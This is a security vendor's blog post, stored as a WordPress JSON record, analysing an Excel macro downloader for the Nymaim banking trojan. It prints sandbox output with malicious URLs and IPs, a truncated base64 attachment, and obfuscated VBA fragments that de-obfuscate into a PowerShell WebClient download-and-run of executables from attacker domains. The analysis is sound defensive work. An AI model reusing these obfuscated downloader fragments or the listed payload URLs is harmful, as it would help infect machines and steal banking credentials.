{"id":1186,"date":"2024-08-30T05:28:14","date_gmt":"2024-08-30T05:28:14","guid":{"rendered":"https:\/\/xdr-mdr.lmntrix.com\/main_web\/?p=1186"},"modified":"2025-07-28T13:53:14","modified_gmt":"2025-07-28T13:53:14","slug":"banking-malware-hidden-in-malicious-excel-spreadsheets","status":"publish","type":"post","link":"https:\/\/lmntrix.com\/blog\/banking-malware-hidden-in-malicious-excel-spreadsheets\/","title":{"rendered":"Banking malware hidden in malicious Excel spreadsheets"},"content":{"rendered":"
\n
\"\"<\/figure>\n<\/div>\n\n\n

We recently discovered a malicious excel file and ran it through Virus Total and only fifteen Anti-Virus vendors detected it as malware (another case of the poor hit rate for AV):<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

It was commonly identified as \u2018X97M\/Powmet\u2019 and an online sandbox report gave us the following details:<\/p>\n\n\n\n

submitname:\u201d228222c7d5b85865b61ca9f5ae47d3699c608b05d158f6882460a9a11bf8a683\u2033<\/p>\n\n\n\n

memurl:\u201dPattern match: https:\/\/farsonka.co\/trb.exe\u201d,\u201d%appdata%.exe,Pattern match: https:\/\/farsonka.co\/trb.exe,Heuristic match: em.ne,Heuristic match: lzlgygnfbnnf.com,Heuristic match: gesofgamd.com,Heuristic match: farsonka.co,Pattern match: https:\/\/farsonka.co\/trb.exe\u2019+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe\u201d<\/p>\n\n\n\n

vbaurl:\u201dHeuristic match: em.ne\u201d<\/p>\n\n\n\n

domains:\u201dlzlgygnfbnnf.com,gesofgamd.com\u201d<\/p>\n\n\n\n

hosts:\u201d49.51.34.195:443,77.122.235.58:80,46.173.91.205:80,109.162.2.39:80,119.28.100.124:80,31.202.198. 37:80,94.179.220.41:80,188.26.78.154:80,109.62.178.54:80,46.118.125.90:80,46.118.117.40:80,94.154.208. 156:80,37.229.44.69:80,94.244.149.221:80\u2033<\/p>\n\n\n\n

This shows a number of important details including malicious URLs and IP addresses. After receiving more samples (below) we ran further analysis starting with the initial file: SHA256: 228222c7d5b85865b61ca9f5ae47d3699c608b05d158f6882460a9a11bf8a683<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

The file type detection tool shows us it was a \u2018POIFS\u2019 document, most likely an MS office doc.<\/p>\n\n\n\n

\"\"
Figure 1 POIFS document    <\/em><\/figcaption><\/figure>\n\n\n\n

OfficeMalscanner was the obvious choice for working on this file type, and it found the file was an Excel document:<\/p>\n\n\n\n

\"\"
Figure 2 Excel file type<\/em><\/figcaption><\/figure>\n\n\n\n

OLE2 compound format document was detected but didn\u2019t show any malicious traces present. In officemalscanner, info parameter can extract the vbmacro code and save it as dump.<\/p>\n\n\n\n

\"\"
Figure 3 VBMacro code Extraction<\/em><\/figcaption><\/figure>\n\n\n\n
\"\"
Figure 4 Extracted files<\/em><\/figcaption><\/figure>\n\n\n\n

Now we can manually examine these files, especially \u2018ThisWorkbook\u2019 file. That code contains the malicious URL details in the function:<\/p>\n\n\n\n

<\/p>\n\n\n\n

\"\"
Figure 5 ThisWorkbook<\/em><\/figcaption><\/figure>\n\n\n\n

We tried the same technique with the other excel files and URLS, these were also flagged as malicious:<\/p>\n\n\n\n

\"\"
Figure 6 VT Result for the link found inside the code<\/em><\/figcaption><\/figure>\n\n\n\n
\"\"
Figure 7 VT Result for downloaded file<\/em><\/figcaption><\/figure>\n\n\n\n

Having confirmed the file was indeed malware, we then downloaded that executable for analysis. Before running further analysis, we checked to see if any previous research work had been carried out on this malware family and found it belongs to a banking trojan strain called \u2018Nymaim\u2019. Below is the email content:<\/p>\n\n\n\n

\"\"
Figure 8 Email as sample<\/em><\/figcaption><\/figure>\n\n\n\n

When we drill down in the email content, we found attachment-related information:<\/p>\n\n\n\n

\u20133185877-57515121-2273465795-5285<\/p>\n\n\n\n

Content-Type: application\/zip; name=\u201dTHP_45424.zip\u201d<\/p>\n\n\n\n

Content-Transfer-Encoding: Base64<\/p>\n\n\n\n

Content-Disposition: attachment; filename=\u201d002_75724.zip\u201d<\/p>\n\n\n\n

UEsDBBQAAAAIAIdW5ko991G0PFgAAAAUAQAMAAAAMjAxNy43LjYueGxz7F0LeFTVtV5nMknO<\/p>\n\n\n\n

JBBmAoQQHhkIICiBkwwgymsgvMQQEKLQIoUAE6CEJI2JBoEStbaFKvLoxRe3VQv1BeUhlqqI<\/p>\n\n\n\n

sfaqfMbq1Xp7rd5bH1d71dp+H3rV9trOXWufc2b22WefM+dAeu93v6+Tb00ya9b+\/7XWXnud<\/p>\n\n\n\n

fc488vJLkbfuPVbyNgi3qZAFf02GIIfTBVAU80EYYImh+2symTTV21CSf7\/9v7n9BeUqnLMs<\/p>\n\n\n\n

lCBKNgrNeS6KihJCyUPJR+mB0hOlAKWXXgIQQSlE6Y3SB6UvShFKP5RilP4oJSgDUAaiDEIZ<\/p>\n\n\n\n

\/\/ removed (\u2026 many lines are edited because of the huge size)<\/p>\n\n\n\n

\u20133185877-57515121-2273465795-5285\u2013<\/p>\n\n\n\n

We then extracted that code and converted it using Base64 code:<\/p>\n\n\n\n

\"\"
Figure 9 before decoding<\/em><\/figcaption><\/figure>\n\n\n\n
\"\"
Figure 10 after decoding<\/em><\/figcaption><\/figure>\n\n\n\n

Then we decoded it and \u2013 because it starts with \u2018PK\u2019 \u2013 it is clearly a packed file or zip file. After we unzipped it, we found it contains an excel file and, using the analysis tools, we were able to compare it with the previous file\u2019s code:<\/p>\n\n\n\n

\"\"
Figure 11 Extracted Excel file from the email file    <\/em><\/figcaption><\/figure>\n\n\n\n
\"\"
Figure 12 Extracted Macros inside the Excel from email file<\/em><\/figcaption><\/figure>\n\n\n\n

We extracted the file\u2019s macro and compared it to the previous file \u2013 both contained the same code:<\/p>\n\n\n\n

{h\u201d + \u201ctt\u201d + \u201cp:\u201d + \u201c\/\/\u201d + tmauw + \u201c\/news.ex\u201d + \u201ce})) { t^ry { $fg = $ra^n^do^m\u201d + detfrop + \u201cn^e^xt(0, 61132); $\u201d<\/p>\n\n\n\n

Function detfrop()<\/p>\n\n\n\n

azerba = \u201c-google.com\u201d<\/p>\n\n\n\n

Functions were heavily obfuscated inside the code. And we have reverse string call then it will be feed as input to other function.<\/p>\n\n\n\n

Function burgersfoot()<\/p>\n\n\n\n

leopards = \u201co^\u201d + \u201cD.^\u201d + \u201c)t^n\u201d + \u201ce^\u201d + \u201cil\u201d + \u201ccbe\u201d + \u201cw.^t^e\u201d + \u201cn.\u201d + \u201cm^e^t^s\u201d + \u201cy^s\u201d + \u201d t^c\u201d + \u201cej^bo^-\u201d + \u201cw^en^(^ ;\u201d<\/p>\n\n\n\n

burgersfoot = StrReverse(leopards)<\/p>\n\n\n\n

For instance in the above StrReverse \u2013 \u201co^\u201d + \u201cD.^\u201d + \u201c)t^n\u201d + \u201ce^\u201d + \u201cil\u201d + \u201ccbe\u201d + \u201cw.^t^e\u201d + \u201cn.\u201d + \u201cm^e^t^s\u201d + \u201cy^s\u201d + \u201d t^c\u201d + \u201cej^bo^-\u201d + \u201cw^en^(^ ;\u201d<\/p>\n\n\n\n

Reversing \u2018leopards\u2019 we found the following string \u2013 \u201cnewobjetcsystem.net.webclient.Do\u201d. This string is passed on to bugersfoot(). Then bugersfoot() is used in other functions \u2013 it keeps on going and makes reversing tough. The best way for us to proceed was to use the compiler and run the code so the behaviour could be observed:<\/p>\n\n\n\n

avromit = ferdomon + \u201ce},{h\u201d + \u201ctt\u201d + \u201cp:\u201d + \u201c\/\/\u201d + tmauw + \u201c\/news.ex\u201d + \u201ce})) { t^ry { $fg = $ra^n^do^m\u201d + detfrop + \u201cn^e^xt(0, 61132); $\u201d<\/p>\n\n\n\n

jasdill = tiommw + \u201d = \u2018%\u201d + Left(kawasa, 1) + tiommw + \u201cda\u201d + \u201cta%\\\u2019 + $fg + \u2018.e\u201d + ferdomon + \u201ce’\u201d + burgersfoot<\/p>\n\n\n\n

lipokoljd = \u201cw^nl^o^\u201d + \u201cad^Fi^le($um.ToString(), $pp); St^a^rt-^P\u201d + tiopkas + \u201cst $err^or[0].E^x^cep^ti^on \u201d + \u201c} }\u201d<\/p>\n\n\n\n

This avromit is equal to ferdomon plus some other strings. If we look at the strings, it appears to \u201ch+tt+p\u2026\u201d nothing but http:\/\/ and it has some functions like as \u2018tmauw\u2019 and news.exe so we checked what was in the function \u2018tmauw\u2019.<\/p>\n\n\n\n

Function tmauw()<\/p>\n\n\n\n

siguar = Array(xlZero, Timer(), \u201co\u201d, Timer(), \u201cp.c\u201d, Timer(), Minute(Now), Timer(), Timer(), Timer(), \u201cm\u201d & Null, Timer(), Minute(Now), Timer(), Timer(), Timer(), Null)<\/p>\n\n\n\n

tmauw = \u201cbif\u201d + Array(siguar(2) + \u201co\u201d + siguar(4) + \u201co\u201d + siguar(10))(0)<\/p>\n\n\n\n

End Function<\/p>\n\n\n\n

Its hxxp:\/\/bifoop(.)com\/news.exe and is flagged by many AV vendor as malicious. We checked another interesting function and we found a new url so we examined that function too:<\/p>\n\n\n\n

hamnuur = \u201c-Wi^ \u201d & \u201c1 -N^\u201d + \u201cO^Pr^ \u201d + edfoploo + \u201co^re\u201d + kawasa + \u201d @(\u201d + \u201c{\u201d + newsdews + \u201ctp:\/\u201d + \u201c\/\u201d + noterdams + \u201c\/vol\u201d + detfrop + \u201ce\u201d<\/p>\n\n\n\n

In this function, we can see http but need to resolve the noterdams and derfrop functions:<\/p>\n\n\n\n

Function detfrop()<\/p>\n\n\n\n

azerba = \u201c-google.com\u201d<\/p>\n\n\n\n

detfrop = Left(Right(azerba, 4), 1)<\/p>\n\n\n\n

End Function<\/p>\n\n\n\n

Function noterdams()<\/p>\n\n\n\n

teamtime = Array(11, Timer(), Minute(Now), \u201cs\u201d, Timer(), Timer(), \u201cicn\u201d, Timer(), Timer(), Timer(), \u201cyk.co\u201d & Null, Timer(), Timer(), Null, Timer(), Timer(), Timer(), 0)<\/p>\n\n\n\n

noterdams = \u201cpa\u201d & Array(teamtime(3) & teamtime(6) & teamtime(10) & \u201cm\u201d)(0)<\/p>\n\n\n\n

End Function<\/p>\n\n\n\n

It is contacting hxxp:\/\/pasicnyk(.)com which is clearly malicious domain.<\/p>\n\n\n\n

Conclusion<\/strong><\/p>\n\n\n\n

As usual, we recommend disabling the macros in MS office documents. Always be cautious with email attachments, particularly from unknown senders. Finally, we recommend you block those malicious URLs in the firewall and proxy.<\/p>\n","protected":false},"excerpt":{"rendered":"

We recently discovered a malicious excel file and ran it through Virus Total and only fifteen Anti-Virus vendors detected it as malware (another case of the poor hit rate for AV): It was commonly identified as ‘X97M\/Powmet’ and an online sandbox report gave us the following details: submitname:”228222c7d5b85865b61ca9f5ae47d3699c608b05d158f6882460a9a11bf8a683″ memurl:”Pattern match: https:\/\/farsonka.co\/trb.exe”,”%appdata%.exe,Pattern match: https:\/\/farsonka.co\/trb.exe,Heuristic match: em.ne,Heuristic […]<\/p>\n","protected":false},"author":1,"featured_media":1202,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21],"tags":[],"class_list":["post-1186","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-labs"],"_links":{"self":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/1186","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/comments?post=1186"}],"version-history":[{"count":4,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/1186\/revisions"}],"predecessor-version":[{"id":4443,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/1186\/revisions\/4443"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/media\/1202"}],"wp:attachment":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/media?parent=1186"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/categories?post=1186"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/tags?post=1186"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}